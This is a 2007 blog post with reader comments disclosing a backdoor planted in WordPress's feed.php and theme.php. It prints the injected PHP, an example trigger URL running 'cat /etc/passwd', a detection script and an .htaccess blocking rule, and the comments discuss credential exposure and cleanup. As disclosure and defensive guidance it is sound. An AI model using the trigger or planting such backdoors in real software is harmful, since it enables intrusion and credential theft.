Saturday, March 3, 2007

WordPress source code compromised to enable remote code execution

While assessing the security of WordPress, a popular blog creation software, I have discovered that its source code has recently been compromised by a third party in order to enable remote command execution on the machines running affected versions. The compromised files are wp-includes/feed.php and wp-includes/theme.php.
The following code has been added:

in wp-includes/feed.php

function comment_text_phpfilter($filterdata) {
if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }

in wp-includes/theme.php

function get_theme_mcommand($mcds) {
if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }

This would enable remote command execution on machines running compromised versions, for example:

http://wordpressurl/wp-includes/theme.php?iz=cat /etc/passwd

I have discovered this vulnerability on Friday, March 2nd 2007 and contacted WordPress about it straight away. They reacted promptly by disabling downloads until further investigation. Later they determined that only one of two servers had been compromised and that the two files mentioned above are the only ones changed.

It seems that the above files were changed on Feb 25th, 2007, so if you downloaded WordPress between Feb 25th, 2007 and Mar 2nd 2007 it is possible that you are running a compromised version; be sure to check for the above code.
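The check described above can be scripted. The following is an added example, not code from the original post: it greps the two named files for the indicators quoted in the post (the two injected function names and the $_GET["ix"] / $_GET["iz"] lookups) and counts access-log requests that try to trigger them. It assumes a standard WordPress layout under the given root and a common-log-format Apache access log; all paths are placeholders.

```shell
#!/bin/sh
# Added example, not code from the original post. Scans a WordPress tree for
# the backdoor indicators named in the post (function names and the ix/iz GET
# parameters) and counts access-log requests that try to trigger them.

# Indicators quoted from the post: the two injected function names and the
# $_GET["ix"] / $_GET["iz"] lookups. Extended regex for grep -E.
WP_BACKDOOR_PATTERN='comment_text_phpfilter|get_theme_mcommand|\$_GET\["i[xz]"\]'

# check_wp_backdoor <wordpress_root>
# Returns 0 if both files are present and clean, 1 if either file carries an
# indicator (matching lines are printed with line numbers), 2 if a file is
# missing and nothing suspect was found.
check_wp_backdoor() {
    root="$1"
    rc=0
    for f in wp-includes/feed.php wp-includes/theme.php; do
        if [ ! -f "$root/$f" ]; then
            echo "MISSING: $root/$f" >&2
            if [ "$rc" -eq 0 ]; then rc=2; fi
            continue
        fi
        if grep -nE "$WP_BACKDOOR_PATTERN" "$root/$f"; then
            echo "SUSPECT: $root/$f contains backdoor indicators" >&2
            rc=1
        fi
    done
    return "$rc"
}

# check_access_log <access_log>
# Prints how many requests hit feed.php or theme.php with an ix= or iz=
# parameter anywhere in the query string, i.e. attempts to trigger the code.
check_access_log() {
    # grep -c exits 1 when the count is 0; that is not an error here.
    grep -cE 'wp-includes/(feed|theme)\.php\?([^ ]*&)?i[xz]=' "$1" || true
}

# Usage on a server (paths are placeholders):
#   sh check_wp.sh /path/to/wordpress [/path/to/access.log]
if [ "$#" -ge 1 ]; then
    check_wp_backdoor "$1" && echo "OK: no indicators in $1"
    if [ -n "$2" ]; then
        echo "trigger attempts in $2: $(check_access_log "$2")"
    fi
fi
```

A clean archive of the same release is the better comparison if you still have it; this script only confirms the presence or absence of the indicators quoted above.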

About WordPress
"WordPress is a state-of-the-art semantic personal publishing platform with a focus on aesthetics, web standards, and usability. What a mouthful. WordPress is both free and priceless at the same time."

Thanks to Ryan Boren of WordPress for quick response and his feedback regarding this issue.


Mr Apache said...

Code to forbid requests with query strings ix or iz

# Requires mod_rewrite and AllowOverride FileInfo for the directory.
RewriteEngine On
# Match ix= or iz= only as a whole parameter name, so that unrelated
# query strings such as prefix= or quiz= are not blocked as well.
RewriteCond %{QUERY_STRING} (^|&)(ix|iz)= [NC]
RewriteRule .* - [F]

Ultimate htaccess article

Doug Karr said...


Could this be utilized to obtain any information from the source site? Example: logins, passwords, MySQL configuration, OpenID configuration, etc?

I'm curious if simply downloading and installing the corrected software is a total solution or whether or not anyone is advising WP users to reconfigure their logins/passwords, etc.


Ivan Fratric said...

Dear Doug,

the exploitation of this, by itself, leads to command execution on the affected machine under the privileges of the web server user, typically 'nobody'. This means that the cracker could read any files readable by this user. This typically includes web application configuration files (which typically contain the MySQL username and password the web application uses to connect to the database), as well as files such as /etc/passwd, which contains a list of usernames for the server, which could be used in brute-force type attacks. The cracker could also modify any files writeable by this user and upload files to folders writeable by this user.

However, you should also consider the following - obtaining admin privileges on the machine once you have established remote access, even as an unprivileged user, is usually by far easier than obtaining the remote access itself.

So to conclude, if you were running the compromised version (and it's quite easy to check if you kept the downloaded archive somewhere) it would be best if you changed all relevant passwords and logins where appropriate.

Ivan Fratric said...

Plus, the cracker might manage to put some kind of backdoor on the server using this, so the absolutely safest thing to do would be to do a clean install of everything.

ceras said...

That bug doesn't work, I have WordPress from January, these files feed.php ...

and command execution doesn't work, I get a white page :)

That's fucking bullshit, not a bug

Ivan Fratric said...


You wouldn't be affected if you downloaded WordPress in January, only if you downloaded it between Feb 25th and Mar 2nd and only if you downloaded it from the compromised server.

If you want confirmation, take a look at

Shelly said...

I had a question. I just installed WP 2.1 (NOT 2.1.1) a few weeks ago for a client who needed 16 different installations (didn't want to use MU).

I've been told by the wp-pro list that I *should* be okay with 2.1, because the exploit wasn't in that version (and if it were, I had downloaded my copy January 28 - so I'm in the clear anyway). However, someone said that the reason 2.1.1 was released was to fix another security flaw, and I should have upgraded anyway.

I guess I'd like to know this: should I download the new 2.1.2 and upgrade all 16 of those blogs already? I don't know what security flaw is in 2.1 - nothing was mentioned - but I'd appreciate any advice on this.

Ivan Fratric said...


You really should be asking this in a WordPress support forum.
Having said that, I'm not aware of any vulnerabilities fixed from 2.1 to 2.1.1 (which doesn't mean there weren't any), but there are known vulnerabilities in 2.1.1 which are possibly present in previous versions as well. You can find out the details at
These are all script injection vulnerabilities. They aren't exactly what I would call critical, but should be taken care of nevertheless.

Shelly said...

Thanks Ivan,

Actually, I *did* ask at the support forums - I guess I'm impatient ;) I did get advice on basically what you said: that it wouldn't hurt to upgrade to 2.1.2, but it's not absolutely necessary.

I've already emailed the client with this information, and I'm letting them decide what they want me to do. I couldn't find the exact information you gave me (about the injection), but I did tell them there wouldn't have been an upgrade if it weren't something important.

Thanks for your advice - I appreciate it :)

Anonymous said...

For the time being this bug is not working on any of the WordPress installations I tried. But this post is good, thanks for sharing.

Best Regards,
Eliena Andrews

Piyush said...

Hi Ivan,
I have posted about your discovery on my blog. Here is the link.
Thanks for sharing this.
